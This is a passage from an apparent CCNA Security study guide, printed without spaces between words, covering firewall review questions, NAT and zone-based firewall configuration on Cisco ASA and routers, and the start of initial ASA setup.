13. ApacketwasjustreceivedwiththeSYN/ACKflagsset.Whatdatastructurewillastatefulfirewallusetodeterminewhetherthispacketisallowed?
A. ARPcache
B. Routingtable
C. DNSresolvercache
D. Statetable
14. Installingbothpersonalandnetworkfirewallsisanexampleofexercisingwhatconcept?
A. Defenseindepth
B. Separationofduties
C. Leastprivilege
D. Needtoknow
15. ASOCKSfirewallisanexampleofwhichfirewalltechnology?
A. Packet-filteringfirewalls
B. Circuit-levelfirewall
C. Proxyservers
D. Statefulfirewalls
16. Whichtraffictypewouldbeacceptedbyastatefulfirewall?
A. ASYN/ACKpacketthatisnotrelatedtoacurrentconnection
B. AnACKpacketthatisinresponsetoaSYNpacketinacurrentconnectionsetup
C. ASYN/ACKpacketinresponsetoaSYNpacketinacurrentconnectionsetup
D. AnACKpacketthatisnotrelatedtoacurrentconnection
17. Whichofthefollowingisnotaproxyfirewall?
A. SOCKSfirewalls
B. Circuit-levelfirewalls
C. Statefulfirewalls
D. Kernel-levelfirewalls
18. Whichstatementisnottrueofpersonalfirewalls?
A. MaybethosethatcomewithanoperatingsystemliketheWindowsFirewallormaybethird-partyhostedfirewalls
B. Protectonlythedeviceonwhichthesoftwareisinstalled
C. Cancontrolegresstraffic
D. Canbeareplacementforproperlypositionednetworkfirewalls
19. Whichfirewalltechnologyisthemostdetrimentaltoperformance?
A. Applicationlevel
B. Stateful
C. Packetfiltering
D. SOCKS
20. WhichfirewalltypeoperatesattheNetworkandTransportlayers?
A. Circuit-levelproxy
B. Packetfiltering
C. Stateful
D. SOCKS
Chapter14ConfiguringNATandZone-BasedFirewallsCISCOCCNASECURITYEXAMOBJECTIVESCOVEREDINTHISCHAPTER:
5.3ImplementNATonCiscoASA9.x
Static
Dynamic
PAT
PolicyNAT
VerifyNAToperations
5.4Implementzone-basedfirewall
Zonetozone
Self-zone
NetworkAddressTranslation(NAT)isafeaturefoundinfirewallsandmanyrouterplatformsthatallowsforthetranslationofprivateIPaddressestopublicIPaddressesatthenetworkedge.WhileoneofthedrivingforcesbehindthedevelopmentofNATwastheconservationofpublicIPv4addressspace,NATalsohasasecuritycomponentinthattheprocesshelpstohidetheinterioraddressingscheme.Zone-basedfirewallingisanapproachthatmakestrafficfilteringdecisionsbetweenzonesratherthanbyspecificIPaddresses.Inthischapter,youwilllearnhowtoimplementseveraltypesofNATandconfigurezone-basedfirewalling.
Inthischapter,youwilllearnthefollowing:
HowtoimplementNATonCiscoASA9.xplatforms
Howtoimplementzone-basedfirewalls
ImplementingNATonASA9.xTherearethreetypesofNATthatcanbeimplemented.Thissectiondiscusseshowthesethreetypesoperate,andyou’lllearnhowtoimplementeachtypeontheAdaptiveSecurity
Appliance(ASA).
InstaticNAT,eachprivateIPaddressismappedtoapublicIPaddress.WhilethisdoesnotsaveanyofthepublicIPv4addressspace,itdoeshavethebenefitofhidingyourinternalnetworkaddressschemefromtheoutsideworld.
IndynamicNAT,apoolofpublicIPaddressesisobtainedthatisatleastequaltothenumberofprivateIPaddressesthatrequiretranslation.However,ratherthanmappingtheprivateIPaddressestothepublicIPaddresses,theNATdevicemapsthepublicIPaddressesfromthepoolonadynamicbasismuchlikeaDHCPserverdoeswhenassigningIPaddresses.
Finally,PortAddressTranslation(PAT)isaformofNATinwhichallprivateIPaddressesaremappedtoasinglepublicIPaddress.ThisprovidesbothbenefitsofsavingtheIPv4addressspaceandhidingthenetworkaddressscheme.ThissystemiscalledPATbecausetheephemeralportnumbersthatdeviceschooseasthesourceportforaconnection(whicharechosenrandomlyfromtheupperrangesoftheportnumbers)areusedtoidentifyeachsourcecomputerinthenetwork.ThisisrequiredsincealldevicesaremappedtothesamepublicIPaddress.
WhenconfiguringNATontheASA,youneedtounderstandthatitusesanobject-orientedapproach.Inotherwords,anobjectiscreatedforeachhost,foreachtranslatedaddress,andforeachservicethatisusedinthetranslationprocess.Translationsareconfiguredasnetworkobjects.AnetworkobjectisdefinedasasingleaddressorasanetworkID.
TheresultinghostornetworkdefinedinanetworkobjectisusedtorepresenttheprivateIPaddresspriortotranslation.WhenACLsareusedtodefinetrafficallowedfromalower-securityinterfacetoahigher-securityinterface,thesepretranslationobjectsarereferenced.
TheASAusesaNATtabletoholdthetranslations.Thistablehasthreesections.WhenanoutgoingpacketarrivesattheASA,thesectionsarereadfromtoptobottom,andthefirsttranslationmatchisapplied.Thethreesectionsareasfollows:
ManualNATThiscontainstranslationsthathavebeendefinedtobeappliedbytheappliancebeforetheothersectionsareconsulted.ThesetranslationsaretypicallyveryspecificandmayindicateatranslationonboththesourceanddestinationIPaddresses.
AutoNATInthissection,alsocalledobjectNAT,translationsthataredefinedontheobjectitselfarecontained.Thesetranslations,oneforeachobject,aretypicallyeitherstatictranslationsforserversthatmustbereachedfromtheoutsideworld(andrequirethesamepublicIPaddressalways)ordynamictranslationsforclientstryingtoreachtheInternet.
ManualNATafterAutoNATThiscontainsmoregeneraltranslationsnothandledbythefirsttwosections.Theseareusedonlywhennotranslationmatchesinthefirsttwosections.
Ifapacketdoesn’tmatchanyofthemappingsfoundinanyofthethreetables,thepacketsaresentuntranslated.
Static
ToconfigureastaticNATtranslation,followthestepsinthenextprocedure.
ConfiguringStaticNATInthisprocedure,youwillcreateastaticNATmappingforadevice.
1. ConnecttotheASAusingtheAdaptiveSecurityDeviceManager(ASDM).
2. NavigatetoConfiguration Firewall NetworkObjects Groups.SelectAddNetworkObject.Definetheparametersofthisobject.EnterthetypeandtheIPaddressofthedevicetobetranslatedwiththestaticmapping.EnsurethatthisisthepretranslationIPaddress.
3. IntheNATsectionoftheAddNetworkObjectdialogbox,selecttheAddAutomaticAddressTranslationRulescheckboxandselectStaticasthetypeinthedrop-downboxjustbelowtheAddAutomaticAddressTranslationRulescheckbox.
4. Justbelowthedrop-downboxwhereyouselectStaticistheTranslatedAddrfield.IntheTranslatedAddrfield,clicktheBrowsebutton.Youcanbrowseforobjectsthathavebeencreatedhere,butyouwillbecreatinganewobject,soclicktheAddbuttonatthetopofthepage.
5. WhentheAddNetworkObjectdialogboxappears,enteranameforthetranslatedobjectandtheaddresstypeandpublicIPaddresstowhichthedeviceshouldbetranslated.ThenclickOK.
6. BackontheAddNetworkObjectpagewhereyoudefinedthepretranslationinformation,clicktheAdvancedbuttonintheNATsection.IntheAdvancedNATSettingsdialogbox,selectthesourceinterfaceforthetranslationandthedestinationinterface.ThesewillbenetworkobjectsthatwouldneedtohavebeencreatedpreviouslytorepresenttheinternalandexternalinterfacesontheASA.Youwillchoosethesefromadrop-downbox.
7. ClickOKandthenApply.Theconfigurationisnowcomplete.
DynamicToconfiguredynamicNATtranslation,followthestepsinthenextprocedure.
ConfiguringDynamicNAT
1. ConnecttotheASAusingtheASDM.
2. NavigatetoConfiguration Firewall NetworkObjects Groups.SelectAddNetworkObject.Definetheparametersofthisobject.EnterthetypeandtheIPaddressofthedevicetobetranslatedwiththestaticmapping.EnsurethatthisisthepretranslationIPaddress.
3. IntheNATsectionoftheAddNetworkObjectdialogbox,selecttheAddAutomaticAddressTranslationRulescheckboxandselectDynamicasthetypeinthedrop-downboxjustbelowtheAddAutomaticAddressTranslationRulescheckbox.
4. Justbelowthedrop-downboxwhereyouselectStaticistheTranslatedAddrfield.IntheTranslatedAddrfield,clicktheBrowsebutton.Youcanbrowseforobjectsthathavebeencreatedhere,butyouwillbecreatinganewobject,soclicktheAddbuttonatthetopofthepage.
5. Inthiscase,theobjectyouwillbecreatingwillbearangeofpublicIPaddresses,whichyouwillnameTranslatedPool.EnterarangeofaddressesusingtheStartAddressandEndAddressfields.Whileyouarecreatingonlyonemappingtothepoolinthisexercise,intherealworldensurethatyouhaveenoughpublicIPaddressesinthepoolfortheprivateaddresstobetranslated.
6. BackontheAddNetworkObjectpagewhereyoudefinedthepretranslationinformation,choosethenewnetworkobjectbydouble-clickingitandthenclicktheAdvancedbuttonintheNATsection.IntheAdvancedNATSettingsdialogbox,selectthesourceinterfaceforthetranslationandthedestinationinterface.ThesewillbenetworkobjectsthatwouldneedtohavebeencreatedpreviouslytorepresenttheinternalandexternalinterfacesontheASA.Youwillchoosethesefromadrop-downbox.
7. ClickOKandthenApply.Theconfigurationisnowcomplete.
PATToconfigurePATtranslation,followthestepsinthenextprocedure.
ConfiguringPAT
1. ConnecttotheASAusingtheASDM.
2. NavigatetoConfiguration Firewall NetworkObjects Groups.SelectAddNetworkObject.Definetheparametersofthisobject.EnterthetypeandtheIPaddressofthedevicetobetranslatedwiththestaticmapping.EnsurethatthisisthepretranslationIPaddress.
3. IntheNATsectionoftheAddNetworkObjectdialogbox,selecttheAddAutomaticAddressTranslationRulescheckboxandselectDynamicPAT(Hide)asthetypeinthedrop-downboxjustbelowtheAddAutomaticAddressTranslationRulescheckbox.
4. Inthiscase,youarenotmappingtoanindividualIPaddressortoapoolofIPaddresses;youwillbemappingtotheInternet-facinginterfaceoftheASA.WhenyoudothiswithPAT(Hide)selected,allmappingswillusethepublicaddressconfiguredonthatInternetinterface.UsetheBrowsebuttontobrowsetotheInternet-facinginterfaceontheASA.Ifanobjecthasnotbeencreatedfortheinterface,dosonowbyspecifyingitspublicIPaddress.
5. BackontheAddNetworkObjectpagewhereyoudefinedthepretranslationinformation,choosethenewnetworkobjectbydouble-clickingitandthenclickingtheAdvancedbuttonintheNATsection.IntheAdvancedNATSettingsdialogbox,selectthesourceinterfaceforthetranslationandthedestinationinterface.ThesewillbenetworkobjectsthatwouldneedtohavebeencreatedpreviouslytorepresenttheinternalandexternalinterfacesoftheASA.Youwillchoosethesefromadrop-downbox.
6. ClickOKandthenApply.Theconfigurationisnowcomplete.
PolicyNATInsomescenarios,youmayneedmoreoptionsthanareavailablewithAutoNAT(asyouwillseeinthenextprocedure),oryoumayneedtospecifyexceptionstotheAutoNATrules.ByusingtheManualNATsection,theseoptionswillbeavailabletoyou.Thissectionalsohastheadvantageofbeingcheckedforatranslationmatchbeforetheothertwosections.Whenyoudothis,itisalsocalledPolicyNAT.ItisalsosometimescalledTwiceNATbecausethesamerulecanperformtranslationinbothdirections(translatingnotonlytheaddressinthedeviceinsidethenetworkoutgoingbutalsotheIPaddressoftheexteriordeviceincoming).
Inthescenarioyouwilluseinthenextprocedure,youwillusePolicyNATtocreateamappingforaninternaldevicethatiseffectiveonlywhentheinternaldeviceiscommunicatingwithonespecificexteriordeviceandnoteffectiveotherwise.
ToconfigurePolicyNATtosupportthisscenario,followthestepsinthenextprocedure.
ConfiguringPolicyNAT
1. ConnecttotheASAusingtheASDM.
2. NavigatetoConfiguration Firewall Objects NetworkObjects/Groups.SelectAddNetworkObject.
3. Createthreenetworkobjects:onefortheprivateIPaddressoftheinternaldevice,oneforthepublicIPaddresstowhichtheinternaldevicewillbemapped,andonefortheprivateIPaddresstowhichtheexternaldevicewillbemappedincoming.Definetheparametersofeachobject.Whenyouarefinished,clickApply.
4. Nowyouwilldefinethemanualtranslationthatwillapplyonlybetweenthesetwosystems.NavigatetoConfiguration Firewall NATRules.
5. TheNATRulestableappears.WhenyouconfiguremanualNATentries,theycanbeappliedeitherbeforeorafterNetworkObjectNATrulessuchasthoseyouconfiguredintheearlierprocedures.Inthiscase,youwantthisruletoapplybeforethoserulesdo,soclickAddandthenAddNATRulebefore“NetworkObject”NATRules.TheAddNATRuleboxappears.
6. ThetopsectionoftheAddNATRuledialogboxiswhereyouconfigurehowthepacketwillbeidentifiedfortransitionusingthisrule.IntheSourceInterfacefield,selectAnyfromthedrop-downbox,andintheSourceAddressfieldusethedrop-downboxtoselecttheobjectyoucreatedinstep3representingtheprivateIPaddressoftheinternaldevice.
7. IntheDestinationInterfacefield,selectAnyfromthedrop-downbox,andintheDestinationAddressfieldusethedrop-downboxtoselecttheobjectyoucreatedinstep3representingthepublicIPaddressoftheexternaldevice.
8. Nowthatyouhavedefinedthematchparametersforthetranslation,youneedtoconfigurethetranslation.IntheAction:TranslationPacketsectionintheSourceNATTypedrop-downbox,selectStatic.IntheSourceAddressdrop-downbox,selecttheobjectyoucreatedinstep3representingthepublicIPaddresstowhichtheinternaldeviceshouldbetranslated.IntheDestinationAddressfield,selectOriginalfromthedrop-downbox.
9. SelectOKandthenApply.Theconfigurationisnowcomplete.
VerifyingNATOperationsThereareseveralwaystoverifythatNATisoperatingcorrectly.TheyincludeviewingtheNATtranslationsinthetranslationtableusingtheshowxlatecommand,andincaseswhere
youarenotgettinganyNATtranslations,youcanviewtheconfigurationandcheckforerrorsusingtheshownatcommand.
ViewingTranslationsUsingtheshowxlatecommandonanASAonwhichPAThasbeenconfigured,youcanseeinthefollowingoutputthatthreetranslationshaveoccurred.AsPATisinuse,allthreehavereceivedthesamepublicIPaddress.
hostname#showxlate
3inuse,3mostused
PATGlobal103.61.3.9(0)Local10.1.1.15ICMPid340
PATGlobal103.61.3.9(1024)Local10.1.1.15(1028)
PATGlobal103.61.3.9(1024)Local10.1.1.15(516)
Thefollowingissampleoutputfromtheshowxlatedetailcommand.ItshowsthetranslationtypeandinterfaceinformationwiththreeactivePATs.
TherflagindicatesthatthetranslationisPAT.Theiflagindicatesthatthetranslationappliestotheinsideaddressport.
hostname#showxlatedetail
3inuse,3mostused
Flags:D-DNS,d-dump,I-identity,i-inside,n-norandom,
r-portmap,s-static
TCPPATfrominside:10.1.1.15/1026tooutside:103.61.3.9/1024flagsri
UDPPATfrominside:10.1.1.15/1028tooutside:103.61.3.9/1024flagsri
ICMPPATfrominside:10.1.1.15/21505tooutside:103.61.3.9/0flagsri
ViewingtheConfigurationUsingtheshownatcommand,youcanviewtheconfiguration.Inthefollowingoutput,thereisasinglestatictranslationconfiguredintheinsideinterfacethattranslatesthehostat192.168.5.6to128.10.6.2.Youcanalsoseethattherehavebeennotranslations(hits)ineitherdirectionusingthisconfiguration.
hostname(config)#shownat
NATpoliciesonInterfaceinside:
matchipinsidehost192.168.5.6outsideany
statictranslationto128.10.6.2
translate_hits=0,untranslate_hits=0
ConfiguringZone-BasedFirewallsZonesarecollectionsofnetworksreachableoverarouterinterface.Zonepairsareusedtodefineaunidirectionalfirewallpolicy.Thedirectionisindicatedbyspecifyingthesourceanddestinationzones.Thereisonespecialtypeofzonethatwillbecoveredinthenextsection.
Whenzone-basedfirewallingisused,eachinterface(includingbothphysicalandvirtualinterfaces)isassignedtoazone,andapolicyisappliedtotrafficmovingbetweenzones.TheseconfigurationsuseasyntaxknownastheCiscoCommonClassificationPolicyLanguage.WhenusingtheCiscoCommonClassificationPolicyLanguage,classmapsareusedtodefinetrafficclasses,andpolicymapsareusedtoapplypolicies(actions)tothesetrafficclasses.Finally,servicepoliciesareusedtoactivatepolicymapsonzonepairs.
Whileonlyasingleservicepolicycanbeusedonazonepair,thepolicymapswithincanincludemultipleclassmaps.Theseclassmapswillbecheckedforatrafficmatchintheorderinwhichtheyareconfigured.Ifamatchisnotfoundinthefirstmap,thesecondwillbeconsulted.Whentherearenomatches,thedefaultpolicywillbeappliedtothetraffic.Figure14.1showsthislogic.
FIGURE14.1Multipleclassmaps
Moreover,theseclassmapscanbeusedinmorethanoneservicepolicy.InFigure14.2,twoclassmapshavebeencreated,andtheyhavebothbeenusedintwodifferentservicepolices.
FIGURE14.2Reuseofclassmaps
ClassMapsClassmapshavetwoparts;thefirstidentifiesthetraffic,andthesecondspecifiesanaction.Amatchstatementisusedtospecifythetrafficandcanmatchtrafficbasedonthefollowing:
AnACL
Aprotocol
Anotherclassmap
Theactionsthatcanbedefinedusingactionstatements.Theactionscanbeasfollows:
Inspect:Triggersstatefulpacketinspection
Drop:Deniestraffic
Pass:Permitstraffic
DefaultPoliciesWhennoclassmapmatchesthetraffictype,thedefaultpolicyisinvoked.Thispolicy’sactionsdependonwhethertheinterfacehasbeenassignedtoazoneand,ifso,whatpolicyiscurrentlyineffectforthatzonepairifitexists.Soundcomplicated?Itcanbe.Figure14.3showstherules.
FIGURE14.3Defaultpolicies
Figure14.3appliestotrafficthatisnotcomingfromordestinedtotherouter(self-zone).Whenthatisthecase,therulesareasshowninFigure14.4.
FIGURE14.4Defaultpolicies(self-zone)
UnderstandingtheSelf-ZoneTheself-zoneisaspecialzonethathasnointerfacemembers.Itappliestoanytrafficdestinedfortherouterratherthantrafficthattherouterisrouting.AnexampleofthistypeoftrafficwouldbetraffictomanagethedeviceusingSSH.Italsoappliestotrafficgeneratedbytherouter.ThetrafficgoingfromtherouterbacktothedevicemakingtheSSHconnectiontomanagethedevicewouldbeanexampleofsuchrouter-generatedtraffic.
ConfiguringZone-to-ZoneAccessThefirewallyouwilluseinthefollowingprocedurehasthreeinterfaces:oneconnectedtotheInternet,oneconnectedtotheLAN,andanotherconnectedtotheDMZ.Toconfigurezone-
basedpoliciestosupportthisscenario,followthestepsinthenextprocedure.
ConfiguringZone-BasedFirewallInthisprocedure,youwillconfigureapolicythatperformsstatefulinspectionofHTTPandFTPtrafficcomingtotheDMZfromtheInternet.
1. Definethreesecurityzones:Inside,Outside,andDMZ.Usethefollowingcommandstodoso:
RTR64(config)#zonesecurityinside
RTR64(config)#zonesecurityoutside
RTR64(config)#zonesecuritydmz
2. Assigneachinterfacetoitsproperzone.
RTR64(config)#intgi0/1
RTR64(config-if)#zone-memberinside
RTR64(config)#intgi0/2
RTR64(config-if)#zone-memberoutside
RTR64(config)#intgi0/3
RTR64(config-if)#zone-memberdmz
3. Createaclassmapthatdefinesthetraffic.Inthiscase,thattrafficwillbeHTTPorFTP.ThemapwillbenamedHTTP_FTP_filterandwillperformstatefulinspectionoftheHTTPtraffic.
RTR64(config)#class-maptypeinspectmatch-anyHTTP_FTP_filter
RTR64(config-cmap)#matchprotocolhttp
RTR64(config-cmap)#matchprotocolftp
4. DefineapolicymapnamedDMZ_inspectthatspecifiestrafficthatmatchestheHTTP_FTP_filterclassmap.
RTR64(config)#policy-maptypeinspectDMZ_inspect
RTR64(config-pmap)#classtypeinspectHTTP_FTP_filter
RTR64(config-pmap-c)#inspect
5. Defineazonepaircalledoutside_to_DMZwiththeoutsidezonebeingthesourceandtheDMZzonebeingthedestination.
RTR64(config)#zone-pairsecurityoutside_to_DMZsourceoutside
destinationdmz
6. ApplytheDMZ_inspectpolicytothezonepaircalledoutside_to_DMZ.
RTR64(config-sec-zone-pair)#service-policytypeinspectDMZ_inspect
Theconfigurationisnowcomplete.
SummaryInthischapter,youlearnedaboutthethreeformsofNAT:staticNAT,dynamicNAT,andPAT.YoualsolearnedabouttheNAToptionsavailableintheASA.YoulearnedaboutthebenefitsofNATandhowtoconfigureitandverifyitsoperation.Classmaps,policymaps,andservicepoliciesandtheirrespectivefunctionsinazone-basedfirewallwerecoveredaswell.Finally,thestepstoconfigureandverifyazone-basedfirewallendedthechapter.
ExamEssentialsIdentifytheformsofNetworkAddressTranslation(NAT).TheseincludestaticNAT,dynamicNAT,andPortAddressTranslation(PAT).
DescribethethreesectionsoftheNATtableintheASA.TheManualNATsectionrepresentstranslationsthathavebeendefinedtobeappliedbytheappliancebeforetheothersectionsareconsulted.TheAutoNATsectionrepresentstranslationsthataredefinedontheobjectitself.TheManualNATAfterAutoNATsectioncontainsmoregeneraltranslationsnothandledbythefirsttwosections.
IdentifybenefitsofpolicyNAT.Insomescenarios,youmayneedmoreoptionsthanareavailablewithAutoNAT,oryoumayneedtospecifyexceptionstotheAutoNATrules.ByusingtheManualNATsection,theseoptionswillbeavailabletoyou.Thissectionalsohastheadvantageofbeingcheckedforatranslationmatchbeforetheothertwosections.
VerifyNAToperations.ThereareseveralwaystoverifythatNATisoperatingcorrectly.TheyincludeviewingtheNATtranslationsinthetranslationtableusingtheshowxlatecommand,andincaseswhereyouarenotgettinganyNATtranslations,youcanviewtheconfigurationandcheckforerrorsusingtheshownatcommand.
Describethecomponentsofazone-basedfirewallconfiguration.Classmapsareusedtodefinetrafficclasses,andpolicymapsareusedtoapplypolicies(actions)tothesetrafficclasses.Finally,servicepoliciesareusedtoactivatepolicymapsonzonepairs.
Listthestepstoconfigurezone-to-zoneaccess.Fromahighlevel,toconfigurezone-to-zoneaccess,thefollowingstepsmustbeperformed:1)definezones,2)definezonepairs,3)defineclassmapsthatdefinetraffic,4)definepolicymapsthatapplyactionstotheclassmaps,5)applypolicymapstozonepairs,and6)assigninterfacestozones.
ReviewQuestions1. InwhichtypeofNATiseachprivateIPaddressmanuallymappedtoapublicIPaddress?
A. Dynamic
B. Static
C. PAT
D. SAT
2. WhichsectionoftheNATtableintheASAisreadlast?
A. AutoNAT
B. ManualNAT
C. DynamicNAT
D. ManualNATAfterAutoNAT
3. Youneedtocreateamappingforaninternaldevicethatiseffectiveonlywhentheinternaldeviceiscommunicatingwithonespecificexteriordeviceandnoteffectiveotherwise.WhattypeofNATmustyouuse?
A. AutoNAT
B. StaticNAT
C. DynamicNAT
D. PolicyNAT
4. Whatcommandgeneratedthefollowingoutput?
3inuse,3mostused
PATGlobal103.61.3.9(0)Local10.1.1.15ICMPid340
PATGlobal103.61.3.9(1024)Local10.1.1.15(1028)
PATGlobal103.61.3.9(1024)Local10.1.1.15(516)
A. shownat
B. shownatdetail
C. showxlate
D. showpat
5. Inthefollowingcommandoutput,whatdoestherstandfor?
TCPPATfrominside:10.1.1.15/1026tooutside:103.61.3.9/1024flagsri
UDPPATfrominside:10.1.1.15/1028tooutside:103.61.3.9/1024flagsri
ICMPPATfrominside:10.1.1.15/21505tooutside:103.61.3.9/0flagsri
A. Routed
B. Remote
C. PortAddressTranslation
D. Reverse
6. Whichofthefollowingarecollectionsofnetworks?
A. Zonepairs
B. Zones
C. Policymaps
D. Classmaps
7. Amatchstatementcanbebasedonallofthefollowingexceptwhichone?
A. AnACL
B. Protocol
C. Anotherclassmap
D. Devicename
8. Whichofthefollowingactionstriggersstatefulinspectionofthetraffic?
A. Drop
B. Permit
C. Inspect
D. Pass
9. Whichzonehasnointerfacemembers?
A. DMZ
B. Self
C. Inside
D. Outside
10. InwhichtypeofNATareallprivateIPaddressesmappedtoasinglepublicIPaddress?
A. Dynamic
B. Static
C. PAT
D. SAT
11. Inthefollowingcommandoutput,whatdoesthevalue21505represent?
TCPPATfrominside:10.1.1.15/1026tooutside:103.61.3.9/1024flagsri
UDPPATfrominside:10.1.1.15/1028tooutside:103.61.3.9/1024flagsri
ICMPPATfrominside:10.1.1.15/21505tooutside:103.61.3.9/0flagsri
A. Destinationportnumber
B. Sequencenumber
C. Sourceportnumber
D. Acknowledgmentnumber
12. Whichofthefollowingisusedtodefinetrafficclasses?
A. Servicepolicy
B. Zones
C. Policymaps
D. Classmaps
13. Whatcommanddefinesasecurityzone?
A. Zonemember
B. Zonesecurity
C. Setzone
D. Zone
14. TraffictomanagethedeviceusingSSHwouldbelongtowhatzone?
A. Inside
B. DMZ
C. Self
D. Outside
15. Whatcommandassignsaninterfacetoazone?
A. zone-member
B. zone-security
C. setzone
D. zone
16. Whichofthefollowingisusedtoapplyactionstotrafficclasses?
A. Servicepolicy
B. Zones
C. Policymaps
D. Classmaps
17. Whichofthefollowingisusedtodefineaunidirectionalfirewallpolicy?
A. Zonepairs
B. Zones
C. Policymaps
D. Classmaps
18. Inthefollowingcommandoutput,whatdoestheistandfor?
TCPPATfrominside:10.1.1.15/1026tooutside:103.61.3.9/1024flagsri
UDPPATfrominside:10.1.1.15/1028tooutside:103.61.3.9/1024flagsri
ICMPPATfrominside:10.1.1.15/21505tooutside:103.61.3.9/0flagsri
A. Insideaddressport
B. Interior
C. IGP
D. StaticNAT
19. InwhichsectionsoftheNATtableintheASAaretranslationsdefinedontheobjectitself?
A. AutoNAT
B. ManualNAT
C. DynamicNAT
D. ManualNATAfterAutoNAT
20. InwhichtypeofNATisapoolofpublicIPaddressesobtainedthatisatleastequaltothenumberofprivateIPaddressesthatrequiretranslation?
A. Dynamic
B. Static
C. PAT
D. SAT
Chapter15ConfiguringtheFirewallonanASACISCOCCNASECURITYEXAMOBJECTIVESCOVEREDINTHISCHAPTER:
5.5FirewallfeaturesontheCiscoAdaptiveSecurityAppliance(ASA)9.x
ConfigureASAaccessmanagement
Configuresecurityaccesspolicies
ConfigureCiscoASAinterfacesecuritylevels
ConfiguredefaultCiscoModularPolicyFramework(MPF)
Describemodesofdeployment(routedfirewall,transparentfirewall)
Describemethodsofimplementinghighavailability
Describesecuritycontexts
Describefirewallservices
Therearemanyadditionalfirewallconceptsyoualsoshouldunderstandbeyondconfiguringzone-basedfirewallingandnetworkaddresstranslation.Inthischapterwe’lllookatsomeotherfirewallservicesaswellasdiscussthedifferencebetweenaroutedandatransparentfirewall.Moreover,we’llcoversecuritycontextsandconfiguringASAmanagementaccess.Finally,towardtheendofthischaptertheModularPolicyFrameworkapproachtoconfigurationwillbecovered.
Inthischapter,youwilllearnthefollowing:
ConfiguringASAaccessmanagement
Configuringsecurityaccesspolicies
ConfiguringCiscoASAinterfacesecuritylevels
ConfiguringthedefaultCiscoModularPolicyFramework(MPF)
Modesofdeployment(routedfirewall,transparentfirewall)
Methodsofimplementinghighavailability
Securitycontexts
Firewallservices
UnderstandingFirewallServicesTheCiscoASA9.xfirewallseries(whichisthefirewalltestedintheCCNASecurityexam)hasarichsetoffeaturestooffer.Whileitcertainlycanperformthefirewalldutieswehavecometoexpectfromanyenterprise-levelfirewall,suchastrafficfilteringandcontrol,italsooffersmanyotherfunctions.Amongtheseare:
ApplicationInspectionControl(AIC)—Alsocalledapplicationprotocolcontrol,thisfeatureverifiestheconformanceofmajorapplicationlayerprotocoloperationstoRFCstandards.Itcanhelppreventmanyofthetunnelingattemptsandapplicationlayerattacksthatviolateprotocolspecifications.
NetworkAddressTranslation(NAT)—AsyoulearnedinChapter14,theASAsupportsmanyimplementationsofNATincludingpolicyNAT,insideandoutsideNAT,one-to-oneandone-to-manyNAT,andportforwarding(staticNAT)
IPRouting—TheASAhasroutingcapabilitiesincludingstaticanddynamicroutingwithsupportforallmajorroutingprotocolssuchasEIGRP,RIP,OSPF,andBGP.
IPv6support—TheASAsupportsIPv6networkingnativelyandcancontrolaccessbetweenIPv6securitydomains.
DHCP—TheASAcanbeintegratedaseitheraDHCPserveroraDHCPclient.
Multicastsupport—TheASAnativelyintegrateswithmulticastnetworkssupportingInternetGroupManagementProtocol(IGMP)andbothProtocolIndependentMulticastSparseMode(PIM-SM)andbidirectionalProtocolIndependentMulticast(PIM).
UnderstandingModesofDeploymentTheASAcanbedeployedinoneoftwomodes,routedandtransparent.Themodeyouchoosewilldependonrequirementsandneeds.Inthissection,wedifferentiatethesetwomodesofoperation.
RoutedFirewallInroutermode,theASAisservingasarouterandthuseachofitsinterfaceswillresideinaseparateIPsubnet.ItcanuseallmajorroutingprotocolsincludingRIP,EIGRP,OSPF,andBGP.Inenvironmentswherestaticroutingisinuse,itcanuseIPSLAtoperformstaticroutetrackingtodetectwhenonestaticrouteisunavailableandthereforeswitchtoasecondstaticroute.
TransparentFirewallIntransparentmode,theASAisnotactingasarouterandassumesalayer2identitymuchasa
switchdoes.ThismakestheASAtransparenttodevicesoneitherside(fromalayer3perspective);thusthenametransparentmode.Aswithaswitch,however,itispossibletoconfiguretheASAwithamanagementIPaddressforconnectingtoandmanagingtheASA.
UnderstandingMethodsofImplementingHighAvailabilityRegardlessofwhethertheASAisoperatinginroutedortransparentmode,itisprovidingvaluableservicestothenetwork.Therefore,providinghighavailabilityfortheASAandthusfortheservicesitprovidesishighlydesirable.TheASAhasseveralredundancyoptionsavailabletosatisfythisneed.Inthissectionwe’llcoverthreewaysthatmultipleASAscanbedeployedtoprovidethisredundancy.
Active/StandbyFailoverInActive/Standbyfailovertwosecurityappliancesaredeployedwithonlyoneoftheappliancesprocessingtrafficwhilethesecondoneservesasahotstandby.ThisdeploymentmodelisshowninFigure15.1.
FIGURE15.1Active/Standbyfailover
Active/ActiveFailoverInActive/Activefailovertwosecurityappliancesaredeployedwithbothappliancesprocessingtrafficwiththeabilitytosurviveasingledevicefailure.ThisdeploymentmodelisshowninFigure15.2.
FIGURE15.2Active/Activefailover
ClusteringInClustering,threeormoresecurityappliancesaredeployedasasinglelogicaldevice.ThisallowsforthemanagementofthemultipleASAsasaunit.Itprovidesincreasedthroughputandredundancy.ThisdeploymentmodelisshowninFigure15.3.
FIGURE15.3Clustering
UnderstandingSecurityContextsTheASAcanbepartitionedintomultiplevirtualfirewallsorsecuritycontexts.Eachcontextcanhaveitsowninterfaces,policies,andadministrators.ThisresultsfunctionallyinmultiplevirtualfirewallsasshowninFigure15.4,wheremultiplecontextsarebeingusedtosupportmultiplecustomers.
FIGURE15.4Securitycontexts
ConfiguringASAManagementAccessWhilemanyadministratorschoosetomanageandconfiguretheASAusingtheAdaptiveSecurityDeviceManager(ASDM),whenyoudeployanewASAyouwillhavetobeginbysettinguptheASAusingtheCLI.OnlyafteraninterfacewithanIPconfigurationisenabledwillyoubeabletoconnecttothedeviceusingtheASDM.WewillfirstcoverthisinitialconfigurationandwillthenfollowwiththecommandsrequiredtoallowconnectionsfortheASDM.
InitialConfigurationToperformtheinitialconfigurationoftheASA,connecttothedevicefromtheconsoleportandperformtheoperationscoveredinthenextprocedure.
InitialConfigurationoftheASAInthisprocedure,youwillconfiguretheinterfacesoftheASAwithIPaddresses,subnetmasks,andsecuritylevels.Finally,youwillenablethoseinterfaces.
1. ConnecttotheASAusingaconsolecable.
2. Enterinterfaceconfigurationmodefortheexternal(Internetfacing)interface.
asa70(config)#intGi0/1
asa70(config-if)#
3. ConfigureanIPaddressandsubnetmaskfortheinterface.
asa70(config-if)#ipaddress201.16.5.5255.255.255.0
4. Givetheinterfaceaname.Inthiscase,nameitoutside.
asa70(config-if)#nameifoutside
5. Enabletheinterface.
asa70(config-if)#noshutdown
6. Usingthesamecommandsconfigureandenabletwootherinterfaces,namingtheinterfaceleadingtotheDMZasdmzandtheinterfaceleadingtotheprivatenetwork(theLAN)inside.
